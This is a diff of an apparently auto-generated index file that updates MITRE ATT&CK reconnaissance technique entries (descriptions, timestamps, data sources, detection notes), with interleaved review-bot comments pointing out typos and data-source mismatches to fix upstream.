@@ -52439,7 +55541,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Purchase Technical Data description: |- - Before compromising a victim, adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. + Adversaries may purchase technical information about victims that can be used during targeting. Information about victims may be available for purchase within reputable private sources and databases, such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets. Adversaries may purchase information about their already identified targets, or use purchased data to discover opportunities for successful breaches. Threat actors may gather various technical details from purchased data, including but not limited to employee contact information, credentials, or specifics regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). 
id: attack-pattern--0a241b6c-7bb2-48f9-98f7-128145b4d27f @@ -52447,7 +55549,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:15:26.840Z' + modified: '2021-04-15T03:44:43.900Z' created: '2020-10-02T17:05:43.562Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52472,7 +55574,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Scan Databases description: |- - Before compromising a victim, adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan) + Adversaries may search within public scan databases for information about victims that can be used during targeting. Various online services continuously publish the results of Internet scans/surveys, often harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server banners.(Citation: Shodan) Adversaries may search scan databases to gather actionable information. Threat actors can use online resources and lookup tools to harvest information from these services. Adversaries may seek information about their already identified targets, or use these datasets to discover opportunities for successful breaches. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). id: attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f 
@@ -52480,7 +55582,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:20:18.786Z' + modified: '2021-04-15T03:49:49.260Z' created: '2020-10-02T17:00:44.586Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52506,7 +55608,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Scanning IP Blocks description: |- - Before compromising a victim, adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. + Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses. Adversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--db8f5003-3b20-48f0-9b76-123e44208120 
@@ -52514,11 +55616,10 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:06:09.139Z' + modified: '2021-04-15T03:19:38.469Z' created: '2020-10-02T16:54:23.193Z' x_mitre_data_sources: - - Packet capture - - Network device logs + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: |- Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). 
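Review bot: The data-source migration in this hunk keeps only 'Network Traffic: Network Traffic Flow' in place of "Packet capture" and "Network device logs", but the + description line explicitly covers scans that "reveal host software/versions via server banners"; banner strings are not visible in flow records, so 'Network Traffic: Network Traffic Content' would be the matching component for that part of the description. As elsewhere in this commit the value is a faithful copy of upstream ATT&CK, so raise it there.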
@@ -52549,7 +55650,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Search Closed Sources description: |- - Before compromising a victim, adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data) + Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data) Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4 
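Review bot: The + description line in the Search Closed Sources hunk carries over the misspelled citation key "(Citation: D3Secutrity CTI Feeds)" from the - line. Do not correct it in the description alone: the key must stay identical to the matching source_name entry under external_references or the citation will no longer resolve, so the rename has to be applied to both in the upstream STIX data in one change.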
@@ -52557,7 +55658,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:15:53.892Z' + modified: '2021-04-15T03:45:31.020Z' created: '2020-10-02T17:01:42.558Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52587,7 +55688,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Search Engines description: |- - Before compromising a victim, adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) + Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968 
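Review bot: The rewritten description on the + line carries over two upstream typos from the - line, "Search engine services typical crawl online sites to index context" ("typically crawl" and "index content" are intended). Since index.yaml is regenerated from the ATT&CK STIX bundle on every run, fixing these here would be lost; they need to be corrected at the source.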
@@ -52595,7 +55696,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:22:11.245Z' + modified: '2021-04-15T03:52:06.960Z' created: '2020-10-02T16:50:12.809Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52642,7 +55743,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Search Open Technical Databases description: |- - Before compromising a victim, adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan) + Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan) Adversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). id: attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0 
@@ -52650,7 +55751,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:20:44.166Z' + modified: '2021-04-15T03:50:44.308Z' created: '2020-10-02T16:56:05.810Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52684,7 +55785,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Search Open Websites/Domains description: |- - Before compromising a victim, adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) + Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking) Adversaries may search in different online sites depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)). id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365 
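Review bot: Same carried-over typo pattern in this hunk: "social media, new sites, or those hosting information about business operations" on the + line should read "news sites", exactly as it was wrong on the - line. Upstream fix needed for the same reason as the other description hunks.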
@@ -52692,7 +55793,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:22:46.374Z' + modified: '2021-04-15T03:52:41.104Z' created: '2020-10-02T16:48:04.509Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52705,6 +55806,21 @@ reconnaissance: atomic_tests: [] T1594: technique: + created: '2020-10-02T16:51:50.306Z' + modified: '2021-04-15T03:53:33.023Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: reconnaissance + type: attack-pattern + id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26 + description: |- + Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak) + + Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)). + name: Search Victim-Owned Websites + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1594 
@@ -52714,23 +55830,10 @@ reconnaissance: description: Bischoff, P. (2020, October 15). Broadvoice database of more than 350 million customer records exposed online. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Search Victim-Owned Websites - description: |- - Before compromising a victim, adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak) - - Adversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)). 
- id: attack-pattern--16cdd21f-da65-4e4f-bc04-dd7d198c7b26 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: reconnaissance - modified: '2020-10-24T04:23:37.282Z' - created: '2020-10-02T16:51:50.306Z' - x_mitre_data_sources: - - Web logs + x_mitre_platforms: + - PRE + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' x_mitre_detection: Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single @@ -52738,10 +55841,8 @@ reconnaissance: Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields. - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_platforms: - - PRE + x_mitre_data_sources: + - 'Application Log: Application Log Content' atomic_tests: [] T1593.001: technique: 
@@ -52758,7 +55859,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Social Media description: |- - Before compromising a victim, adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff. + Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff. Adversaries may search in different social media sites depending on what information they seek to gather. Threat actors may passively harvest data from these sites, as well as use information gathered to create fake profiles/groups to elicit victim’s into revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)). id: attack-pattern--bbe5b322-e2af-4a5e-9625-a4e62bf84ed3 
@@ -52766,7 +55867,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:22:46.235Z' + modified: '2021-04-15T03:52:40.958Z' created: '2020-10-02T16:49:31.262Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52792,7 +55893,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Software description: |- - Before compromising a victim, adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.). + Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.). Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). 
Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or for initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--baf60e1a-afe5-4d31-830f-1b1ba2351884 @@ -52800,7 +55901,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T03:53:39.162Z' + modified: '2021-04-15T03:23:57.876Z' created: '2020-10-02T16:42:17.482Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
@@ -52839,7 +55940,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Spearphishing Attachment description: |- - Before compromising a victim, adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. + Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon the recipient populating information then returning the file.(Citation: Sophos Attachment)(Citation: GitHub Phishery) The text of the spearphishing email usually tries to give a plausible reason why the file should be filled-in, such as a request for information from a business associate. 
Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc @@ -52847,20 +55948,21 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:12:48.152Z' + modified: '2021-04-15T03:41:33.335Z' created: '2020-10-02T17:08:57.386Z' x_mitre_contributors: + - Philip Winther - Sebastian Salla, McAfee - Robert Simmons, @MalwareUtkonos x_mitre_data_sources: - - Mail server - - Email gateway + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: 'Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender - is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: - Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)' - x_mitre_version: '1.0' + is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - PRE 
@@ -52892,7 +55994,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Spearphishing Link description: |- - Before compromising a victim, adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. + Adversaries may send spearphishing messages with a malicious link to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, the malicious emails contain links generally accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser.(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin) The given website may closely resemble a legitimate site in appearance and have a URL containing elements from the real site. From the fake website, information is gathered in web forms and sent to the attacker. 
Adversaries may also use information from previous reconnaissance efforts (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. id: attack-pattern--2d3f5b3c-54ca-4f4d-bb1f-849346d31230 @@ -52900,19 +56002,21 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:13:12.752Z' + modified: '2021-04-15T03:42:26.537Z' created: '2020-10-02T17:09:50.723Z' x_mitre_contributors: + - Philip Winther - Sebastian Salla, McAfee - Robert Simmons, @MalwareUtkonos x_mitre_data_sources: - - Mail server - - Email gateway + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_detection: |- - Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed. Also consider enabling DMARC to verify the sender of emails.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) + Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing) Monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites. - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: true x_mitre_platforms: - PRE 
@@ -52932,7 +56036,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Spearphishing Service description: |- - Before compromising a victim, adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. + Adversaries may send spearphishing messages via third-party services to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries send messages through various social media services, personal webmail, and other non-enterprise controlled services.(Citation: ThreatPost Social Media Phishing) These services are more likely to have a less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. 
Adversaries may create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and information about their environment. Adversaries may also use information from previous reconnaissance efforts (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)) to craft persuasive and believable lures. id: attack-pattern--f870408c-b1cd-49c7-a5c7-0ef0fc496cc6 @@ -52940,8 +56044,12 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-25T19:44:58.093Z' + modified: '2021-04-15T03:43:12.843Z' created: '2020-10-02T17:08:07.742Z' + x_mitre_data_sources: + - 'Application Log: Application Log Content' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' x_mitre_contributors: - Robert Simmons, @MalwareUtkonos x_mitre_detection: |- 
@@ -52970,7 +56078,7 @@ reconnaissance: created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 name: Threat Intel Vendors description: |- - Before compromising a victim, adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds) + Adversaries may search private data from threat intelligence vendors for information that can be used during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what is publicly reported. Although sensitive details (such as customer names and other identifiers) may be redacted, this information may contain trends regarding breaches such as target industries, attribution claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds) Adversaries may search in private threat intelligence vendor data to gather actionable information. Threat actors may seek information/indicators gathered about their own campaigns, as well as those conducted by other adversaries that may align with their target industries, capabilities/objectives, or other operational concerns. 
Information reported by vendors may also reveal opportunities other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). id: attack-pattern--51e54974-a541-4fb6-a61b-0518e4c6de41 @@ -52978,7 +56086,7 @@ reconnaissance: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: reconnaissance - modified: '2020-10-24T04:15:53.678Z' + modified: '2021-04-15T03:45:30.862Z' created: '2020-10-02T17:03:45.918Z' x_mitre_detection: |- Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. 
